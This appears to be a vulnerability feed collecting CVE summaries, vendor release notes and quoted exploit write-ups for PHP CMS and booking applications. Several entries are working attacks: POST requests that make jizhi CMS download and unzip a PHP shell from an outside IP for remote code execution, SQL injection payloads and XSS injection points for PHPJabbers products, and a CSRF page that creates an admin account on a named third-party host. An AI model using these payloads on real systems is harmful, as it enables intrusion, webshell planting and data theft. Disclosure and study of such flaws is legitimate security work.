Cross Site Scripting vulnerability in Xoops CMS v.2.5.10 allows a remote attacker to execute arbitrary code via the category name field of the image manager function.

This version includes numerous improvements and fixes, including:

*   PHP 7.3 compatibility
*   MySQL 8.0 compatibility
*   XMF improvements for module writers
*   Security updates
*   Updated libraries
*   and many more fixes and updates

See the changelog for more details.

**Asset Checksums**

    SHA256 
    0947834f3943b9352ae3dc21235d83593a60948092c9490a54dbe02aa95202eb  XoopsCore25-2.5.10.tar.gz
    0de298a9680a7aad7627e786750ee6d0f084925f824175a59edeb7577f9cb6c6  XoopsCore25-2.5.10.zip
    
    MD5
    4765767d341826f175fd41831c49bba2  XoopsCore25-2.5.10.tar.gz
    9d5f77d0b3bfeb6a75e844a42a162a92  XoopsCore25-2.5.10.zip
    

Individual file checksums are available in XOOPS/xfilecheck

CVE-2023-36217: Release XOOPS Version 2.5.10 Final · XOOPS/XoopsCore25

An arbitrary file upload vulnerability in the /languages/install.php component of WBCE CMS v1.6.1 allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2023-38947

An arbitrary file download vulnerability in the /c/PluginsController.php component of jizhi CMS 1.9.5 allows attackers to execute arbitrary code via downloading a crafted plugin.

  
Vulnerability lies in http://127.0.0.1/admin.php/Index/index.html  
Extension management at, download location for plugin list  
  
Click on any plugin of the cloud plugin to download  
Burp Suite Packet capture  
  
Can test parameters download\_url  
  
VPS enables HTTP service  
  
Zip compress phpshell.php and upload to VPS  
  
  
  
Successfully caused any file download  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 86  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=start-download&filepath=jzdesign&download\_url=http://119.91.26.244:8090/phpshell.zip

Vulnerability source code analysis:  
Global search for start-download to determine the location of file vulnerabilities  
The vulnerability is located in /A/c/PluginsController.php  
  
  
Line 739 starts with a case statement, followed by an fwrite write operation  
  
Located on line 718, its controllable point is $download\_ url, the path for writing has been provided on line 721, so why can I download any file? The cause of the vulnerability lies in  
  
Starting from line 883, it is the default file download URL, but causing a change after the controllable $download\_url on line 891, resulting in the vulnerability function being curl\_ exec, due to a vulnerability in the curl resource request code, it is possible to arbitrarily request external resources and cause arbitrary file downloads

The function point that can be decompressed is located in the case statement 'file-upzip' on line 776  
  
It will determine whether the file exists. If it exists, it will be saved in A/exts/, and the function will be called get\_zip\_orginalsize to start decompression work  
  
While loop to extract each file  
  
Successfully decompressed  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 32  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=file-upzip&filepath=jzdesign

Access path is http://127.0.0.1/A/exts/phpshell.php  
  
Successfully executing command causing RCE

CVE-2023-38948: jizhi CMS 1.9.5 has a Arbitrary File Download RCE  vulnerability via /A/c/PluginsController.php · Issue #I7LI4E · Pwn师傅/Pwn - Gitee.com

DedeCMS v5.7.109 has a File Upload vulnerability, leading to remote code execution (RCE).

**Dedecms-v5.7.109-RCE**

Since CVE-2022-43192 is not fully fixed, Dedecms still has a file upload vulnerability, leading to RCE. After the vendor released 8 versions of patch updates, I still discovered a vulnerability here. And the exploitation method is different from CVE-2022-43192. 

**Vulnerability to reproduce**

Log in to the backend of the website.

Upload the file phpinfo.php, the content of the file is as follows:

Visit phpinfo.php：

**Vulnerability Analysis**

After adding comments using the /\*\*/ symbol in PHP, any code within the comment block will not be checked and can be easily uploaded. However, during actual access, the /\*\*/ comment symbols may not work as expected and the code within can still be executed.

CVE-2023-36298: GitHub - MentalityXt/Dedecms-v5.7.109-RCE

A File Upload vulnerability in typecho v.1.2.1 allows a remote attacker to execute arbitrary code via the upload and options-general parameters in index.php.

**What's Changed**

*   Fix checkVersion by @sy-records in #1356
*   修复Sqlite目录带.校验不通过问题 by @maoxian-1 in #1357
*   Pr/1344 by @joyqi in #1360
*   Fix pgsql reset id error by @sy-records in #1369
*   Update admin welcome tip by @sy-records in #1389
*   Enhancement of Typecho\\Cookie by @sy-records in #1399
*   fix CORS issues in preview page. 修复文章预览页面跨域问题 by @Valpha in #1400
*   模板缩略图支持识别webp图片后缀 by @jrotty in #1403
*   修正注释 by @jrotty in #1411
*   Fix notice not clear by @sy-records in #1416
*   修复管理员进入其他用户文章列表时显示所有文章的bug by @jrotty in #1415
*   Fix QUIC/https Mixed Content by @MBRjun in #1423
*   Add admin/footer.php begin plugin by @sy-records in #1426
*   Fix missing change themeUrl by @sy-records in #1431
*   Fix category creation error when using xmlrpc by @sy-records in #1443
*   Fix #1449 by @sy-records in #1450
*   Minor update by @vndroid in #1451
*   Minor update by @vndroid in #1460
*   Fix the error of getting request parameters by @sy-records in #1464
*   Fix multiple calls returning the same object (#1412) by @benzBrake in #1478
*   Fix use SQLite error of windows install by @sy-records in #1471
*   Adjust style of edit comments by @sy-records in #1483
*   Fix comments feed jump error by @sy-records in #1491
*   Fix #1495 by @sy-records in #1496
*   Fix unsafe use of jQuery .html() by @l2dy in #1382
*   Fix htmlspecialchars error for feed by @sy-records in #1522
*   Use https links by @l2dy in #1280
*   Support ssl for pdo\_mysql and mysqli by @sy-records in #1525
*   Fix: php 8.1 strtolower not allow null value by @benzBrake in #1559
*   Fix an XSS vulnerability in v1.2.1-rc by @FaithPatrick in #1561
*   fix php 8.1 Deprecated: htmlspecialchars(): Passing null to parameter #1 by @benzBrake in #1570
*   Add a prompt message for manual database creation by @sy-records in #1348
*   fix #1574 by @joyqi in #1575
*   improve release ci, upload built asset after new release published. by @joyqi in #1576
*   重复执行判断的优化 by @logdd in #1586

**New Contributors**

*   @maoxian-1 made their first contribution in #1357
*   @Valpha made their first contribution in #1400
*   @MBRjun made their first contribution in #1423
*   @vndroid made their first contribution in #1451
*   @benzBrake made their first contribution in #1478
*   @FaithPatrick made their first contribution in #1561
*   @logdd made their first contribution in #1586

**Full Changelog**: v1.2.0...v1.2.1

CVE-2023-36299: Release v1.2.1 · typecho/typecho

PHPJabbers Bus Reservation System version 1.1 suffers from a remote SQL injection vulnerability.

    # Exploit Title: PHPJabbers Bus Reservation System 1.1 - SQL Injection# Exploit Author: CraCkEr# Date: 20/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/bus-reservation-system/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4111## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /index.phpGET parameter 'pickup_id' is vulnerable to SQL Injectionhttps://website/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=[SQLi]&session_id=---Parameter: pickup_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&session_id=    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND 07569=7569&session_id=    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (IF - comment)    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3) AND IF(now()=sysdate(),SLEEP(5),0)-- wXyW&session_id=---[-] Done

PHPJabbers Bus Reservation System 1.1 SQL Injection

PHPJabbers Rental Property Booking version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4117## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=[-] Done

PHPJabbers Rental Property Booking 2.0 Cross Site Scripting

PHPJabbers Taxi Booking version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/taxi-booking-script/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4116## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS][-] Done

PHPJabbers Taxi Booking 2.0 Cross Site Scripting

PHPJabbers Cleaning Business version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/cleaning-business-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4115## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS][-] Done

PHPJabbers Cleaning Business 1.0 Cross Site Scripting

WebCalendar version 1.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : WebCalendar v1.3 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip                                                         |  | # Dork      : WebCalendar v1.3                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 173.[+] Set the target site link Save changes and apply . [+] infected file : install/index.php.[+] http://127.0.0.1/q7.3/admin/settings.php.[+] save code as poc.html .[+] <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  <head>    <title>WebCalendar Setup Wizard</title>    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />    <script>    </script>    <script src="../includes/js/visible.js"></script>    <style>      body {        margin:0;        background:#fff;        font-family:Arial, Helvetica, sans-serif;      }      table {        border:0;      }      th.header,      th.pageheader,      th.redheader {        background:#eee;      }      th.pageheader {        padding:10px;        font-size:18px;      }      th.header,      th.redheader {        font-size:14px;      }      th.redheader,      .notrecommended {        color:red;      }      td {        padding:5px;      }      td.prompt,      td.subprompt {        padding-right:20px;        font-weight:bold;      }      td.subprompt {        font-size:12px;      }      div.nav {        margin:0;        border-bottom:1px solid #000;      }      div.main {        margin:10px;      }      li {        margin-top:10px;      }      doc.li {        margin-top:5px;      }      .recommended {        color:green;      }    </style>  </head>  <body onload="auth_handler();">    <table border="1" width="90%" class="aligncenter">      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>      <tr>        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>      </tr>      <th class="header" colspan="2">Application Settings</th>      <tr>        <td colspan="2">          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>        </td>      </tr>      <tr>        <td>          <table width="75%" class="aligncenter">            <tr>            <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">              <input type="hidden" name="app_settings" value="1" />              <td class="prompt">Create Default Admin Account:</td>              <td>                <input type="checkbox" name="load_admin" value="Yes" />                <span class="notrecommended"> (Admin Account Not Found)</span>              </td>            </tr>            <tr>              <td class="prompt">Application Name:</td>              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>            </tr>            <tr>              <td class="prompt">Server URL:</td>              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>            </tr>            <tr>              <td class="prompt">User Authentication:</td>              <td>                <select name="form_user_inc" onChange="auth_handler()">                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>                  <option value="http">Web Server (not detected)</option>                  <option value="user-imap.php">IMAP</option>                  <option value="none" >None (Single-User)</option>                </select>              </td>            </tr>            <tr id="singleuser">              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>              <td><input name="form_single_user_login" size="20" value="" /></td>            </tr>            <tr>              <td class="prompt">Read-Only:</td>              <td>                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;                <input name="form_readonly" value="false" type="radio" checked="checked" />No              </td>            </tr>            <tr>              <td class="prompt">Environment:</td>              <td>                <select name="form_mode">                  <option value="prod" selected="selected">Production</option>                  <option value="dev">Development</option>                </select>              </td>            </tr>          </table>        </td>      </tr>    </table>    <table width="80%" class="aligncenter">      <tr>        <td class="aligncenter">              <input name="action" type="button" value="Save Settings" onClick="return validate();" />              <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />            </form>        </td>      </tr>    </table>  </body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#php